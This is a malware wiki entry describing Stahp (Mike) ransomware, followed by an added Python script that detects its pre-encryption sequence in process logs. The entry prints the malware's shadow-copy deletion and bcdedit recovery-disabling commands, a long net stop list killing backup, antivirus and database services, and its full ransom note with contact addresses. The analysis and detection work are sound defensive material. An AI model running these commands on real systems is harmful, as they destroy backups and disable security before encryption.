malwarewikiaorg-20200223-history
Stahp
Stahp, also known as Mike, is ransomware that runs on Microsoft Windows. Despite its name it is not part of the STOP/Djvu family; it belongs to the HildaCrypt family. The reason it is not STOP/Djvu is that the format of the encrypted file is different: there is no file token or identifier at the end of the file. Instead, the encrypted file contains the string "0200" together with the original file size. The ID shown in the ransom note appears to be the same on every run, and the sample makes no connection to a command and control server. Someone speaking on behalf of the developer, or the developer himself, later said that he does the encryption for his own pleasure and does not encrypt files for ransom. A strange pleasure, apparently. The developer did not spread the ransomware to extort a ransom.

Payload

It deletes the shadow copies of files on the drives and disables the Windows recovery and repair functions at the boot stage using the following commands. The shadow storage of each drive is first shrunk to 401 MB, which makes Windows discard the shadow copies that no longer fit, and then set back to unbounded before the remaining shadows are deleted:

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet

Before encryption, it stops Windows system services (backup, security and database services in particular) with the following commands:

net stop SQLAgent$SYSTEM_BGC /y
net stop "Sophos Device Control Service" /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop "Zoolz 2 Service" /y
net stop McTaskManager /y
net stop "Sophos AutoUpdate Service" /y
net stop "Sophos System Protection Service" /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop "Symantec System Recovery" /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop "Sophos Health Service" /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop "Sophos Message Router" /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCSer y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop "Sophos Clean Service" /y
net stop swi_update_64 /y
net stop "Sophos Web Control Service" /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop "Veeam Backup Catalog Data Service" /y
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfaF y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$2
net stop McShield /y
net stop SepMasterService /y
net stop "Sophos MCS Client" /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop w3svc /y
net stop "SQLsafe Backup Service" /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop "Sophos Safestore Service" /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop "Sophos File Scanner Service" /y
net stop "Sophos Agent" /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop "Enterprise Client Service" /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop "SQL Backups" /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MSDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop "Sophos MCS Agent" /y
net stop RESvc /y
net stop "Acronis VSS Provider" /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop "SQLsafe Filter Service" /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y

Stahp then encrypts the user's data using AES and RSA and appends the .mike extension. Stahp encrypts files with the following extensions:

.3dm, .3ds, .3fr, .3g2, .3gp, .3pr, .7z, .ab4, .accdb, .accde, .accdr, .accdt, .ach, .acr, .act, .adb, .ads, .agdl, .ai, .ait, .al, .apj, .arw, .asf, .asm, .asmx, .asp, .aspx, .asx, .avi, .awg, .back, .backup, .backupdb, .bak, .bank, .bay, .bdb, .bgt, .bik, .bkf, .bkp, .blend, .bpw, .c, .cdf, .cdr, .cdr3, .cdr4, .cdr5, .cdr6, .cdrw, .cdx, .ce1, .ce2, .cer, .cfp, .cgm, .cib, .class, .cls, .cmt, .config, .cpi, .cpp, .cr2, .craw, .crt, .crw, .cs, .csh, .csl, .csproj, .csv, .dac, .db, .db3, .dbf, .db-journal, .dbx, .dc2, .dcr, .dcs, .ddd, .ddoc, .ddrw, .dds, .der, .des, .design, .dgc, .djvu, .dng, .doc, .docm, .docx, .dot, .dotm, .dotx, .drf, .drw, .dtd, .dwg, .dxb, .dxf, .dxg, .eml, .eps, .erbsql, .erf, .exf, .fdb, .ffd, .fff, .fh, .fhd, .fla, .flac, .flv, .fmb, .fpx, .fxg, .gray, .grey, .gry, .h, .hbk, .hpp, .htm, .html, .ibank, .ibd, .ibz, .idx, .iif, .iiq, .incpas, .indd, .jar, .java, .jpe, .jpeg, .jpg, .jsp, .kbx, .kc2, .kdbx, .kdc, .key, .kpdx, .lnk, .lua, .m, .m4v, .manifest, .max, .md, .mdb, .mdc, .mdf, .mef, .mfw, .mmw, .moneywell, .mos, .mov, .mp3, .mp4, .mpeg, .mpg, .mrw, .msg, .myd, .nd, .ndd, .nef, .nk2, .nop, .nrw, .ns2, .ns3, .ns4, .nsd, .nsf, .nsg, .nsh, .nwb, .nx2, .nxl, .nyf, .oab, .obj, .odb, .odc, .odf, .odg, .odm, .odp, .ods, .odt, .oil, .orf, .ost, .otg, .oth, .otp, .ots, .ott, .p12, .p7b, .p7c, .pab, .pages, .pas, .pat, .pbl, .pcd, .pct, .pdb, .pdd, .pdf, .pef, .pem, .pfx, .php, .php5, .phtml, .pl, .plc, .png, .pot, .potm, .potx, .ppam, .pps, .ppsm, .ppsx, .ppt, .pptm, .pptx, .prf, .ps, .psafe3, .psd, .pspimage, .pst, .ptx, .py, .qba, .qbb, .qbm, .qbr, .qbw, .qbx, .qby, .r3d, .raf, .rar, .rat, .raw, .rdb, .rm, .rtf, .rw2, .rwl, .rwz, .s3db, .sas7bdat, .say, .sd0, .sda, .sdf, .sldm, .sldx, .sln, .sql, .sqlite, .sqlite3, .sqlitedb, .sr2, .srf, .srt, .srw, .st4, .st5, .st6, .st7, .st8, .std, .sti, .stw, .stx, .svg, .swf, .sxc, .sxd, .sxg, .sxi, .sxm, .sxw, .tex, .tga, .thm, .tib, .tif, .tlg, .txt, .vb, .vbproj, .vob, .wallet, .war, .wav, .wb2, .wmv, .wpd, .wps, .x11, .x3f, .xis, .xla, .xlam, .xlk, .xlm, .xlr, .xls, .xlsb, .xlsm, .xlsx, .xlt, .xltm, .xltx, .xlw, .xml, .ycbcra, .yuv, .zip

It drops a text file called _readme.txt. The text file says the following:

ATTENTION!
Don't worry, you can return all your files!
All your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.
The only method of recovering files is to purchase decrypt tool and unique key for you.
This software will decrypt all your encrypted files.
What guarantees do you have?
You can send one of your encrypted file from your PC and we decrypt it for free.
But we can decrypt only 1 file for free. File must not contain valuable information.
You can get and look video overview decrypt tool:
https://we.tl/t-UV4s8jgncB
Price of private key and decrypt software is $980.
Discount 50% available if you contact us first 72 hours, that's price for you is $490.
Please note that you'll never restore your data without payment.
Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.
To get this software you need write on our e-mail:
gorentos@bitmessage.ch
Reserve e-mail address to contact us:
gerentoshelp@firemail.cc
Your personal ID:
PtvJag4t9UH4xQK3hJ6uNwm2pRiSeFwPEyjpisZ2BExzgUpmmuJrVXNQ

Categories: Assembly, Win32 ransomware, Ransomware, Win32 trojan, Win32, Microsoft Windows, Trojan
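The Payload section above is the part of Stahp that is easiest to catch before any file is touched: the shadow-storage squeeze to 401MB and back to unbounded, the quiet Delete Shadows, the two bcdedit changes, and a burst of net stop commands against backup, security and database services. The following is an added example, not code from the malware or from this wiki, showing how to score process-creation command lines (the kind Sysmon Event ID 1 or Windows event 4688 with command-line auditing produce) for that sequence. The log layout, host names, timestamps and the service-family keyword groups are this example's own assumptions; the command lines in the sample are taken from the kill list above.

```python
"""Spot the Stahp/HildaCrypt pre-encryption sequence in process-creation logs.

Added example for this page, not code from the malware or from the wiki.
It matches the tampering commands from the Payload section and counts
'net stop' calls against backup, security and database services, then
gives each host a verdict. Log layout, hosts and timestamps are constructed.
"""
import re
from collections import defaultdict

# Constructed sample: "<host> <timestamp> <command line>" per line.
SAMPLE_LOG = """\
WS01 2020-02-23T10:01:02 vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
WS01 2020-02-23T10:01:02 vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
WS01 2020-02-23T10:01:03 bcdedit /set {default} recoveryenabled No
WS01 2020-02-23T10:01:03 bcdedit /set {default} bootstatuspolicy ignoreallfailures
WS01 2020-02-23T10:01:04 vssadmin Delete Shadows /all /quiet
WS01 2020-02-23T10:01:05 net stop VeeamBackupSvc /y
WS01 2020-02-23T10:01:05 net stop "Sophos AutoUpdate Service" /y
WS01 2020-02-23T10:01:05 net stop MSSQL$SQLEXPRESS /y
WS01 2020-02-23T10:01:05 net stop McShield /y
WS01 2020-02-23T10:01:06 net stop AcrSch2Svc /y
WS01 2020-02-23T10:01:06 net stop SQLAgent$VEEAMSQL2012 /y
SRV02 2020-02-23T11:15:00 vssadmin list shadows
SRV02 2020-02-23T11:16:00 net stop spooler /y
"""

# One regex per tampering step from the Payload section.
SHADOW_TAMPERING = {
    "shadowstorage_squeezed": re.compile(r"vssadmin\s+resize\s+shadowstorage.*/maxsize=401MB", re.I),
    "shadowstorage_unbounded": re.compile(r"vssadmin\s+resize\s+shadowstorage.*/maxsize=unbounded", re.I),
    "shadows_deleted": re.compile(r"vssadmin\s+delete\s+shadows.*/all", re.I),
    "recovery_disabled": re.compile(r"bcdedit.*recoveryenabled\s+no\b", re.I),
    "boot_failures_ignored": re.compile(r"bcdedit.*bootstatuspolicy\s+ignoreallfailures", re.I),
}

# 'net stop <svc>' with either a quoted or a bare service name.
NET_STOP = re.compile(r'\bnet1?\s+stop\s+(?:"([^"]+)"|(\S+))', re.I)

# Lower-cased fragments of the service names in the kill list above, grouped
# by what the service protects (assumed grouping); anything else is "other".
SERVICE_FAMILIES = {
    "backup": ("veeam", "backupexec", "acronis", "acrsch", "mozy", "sqlsafe",
               "wbengine", "sdrsvc", "zoolz", "sql backups"),
    "security": ("sophos", "savservice", "savadmin", "swi_", "mcafee", "mfe",
                 "mcshield", "mctaskmanager", "kav", "klnagent", "avp", "ekrn",
                 "ehttpsrv", "symantec", "smcinst", "smcservice", "sepmaster",
                 "tmlisten", "tmccsf", "ntrtscan", "mbam", "mbendpoint",
                 "esgshkernel", "eshasrv", "epsecurity", "epupdate"),
    "database": ("mssql", "sqlagent", "sqlserveragent", "sqlwriter", "sqlbrowser",
                 "sqltelemetry", "mysql", "oracle", "msolap", "reportserver",
                 "msexchange", "msdtsserver", "msftesql"),
}


def classify_service(name):
    """Map a service name to backup / security / database / other."""
    low = name.lower()
    for family, needles in SERVICE_FAMILIES.items():
        if any(n in low for n in needles):
            return family
    return "other"


def analyze(log_text, stop_threshold=5):
    """Return {host: finding} for every host showing any of the behaviour.

    A host is a 'ransomware_precursor' when at least two tampering steps are
    seen together with stop_threshold or more stops of protective services;
    anything weaker is reported as 'suspicious'.
    """
    per_host = defaultdict(lambda: {"tampering": [], "stops": defaultdict(list)})
    for line in log_text.splitlines():
        parts = line.split(" ", 2)
        if len(parts) < 3:
            continue
        host, _ts, cmd = parts
        rec = per_host[host]
        for label, rx in SHADOW_TAMPERING.items():
            if rx.search(cmd) and label not in rec["tampering"]:
                rec["tampering"].append(label)
        m = NET_STOP.search(cmd)
        if m:
            svc = m.group(1) or m.group(2)
            rec["stops"][classify_service(svc)].append(svc)

    findings = {}
    for host, rec in per_host.items():
        protective = sum(len(v) for fam, v in rec["stops"].items() if fam != "other")
        if not rec["tampering"] and protective == 0:
            continue
        strong = len(rec["tampering"]) >= 2 and protective >= stop_threshold
        findings[host] = {
            "tampering": list(rec["tampering"]),
            "protective_services_stopped": protective,
            "families": sorted(fam for fam in rec["stops"] if fam != "other"),
            "verdict": "ransomware_precursor" if strong else "suspicious",
        }
    return findings


if __name__ == "__main__":
    for host, finding in analyze(SAMPLE_LOG).items():
        print(host, finding["verdict"], finding)
```

On the sample, WS01 is reported as a ransomware precursor (all five tampering steps plus six protective services stopped) while SRV02, which only lists shadows and stops the print spooler, is not reported at all. In production the same logic belongs in the SIEM as a short-window correlation per host, since a lone vssadmin or net stop is routine administration and only the combination is the signal.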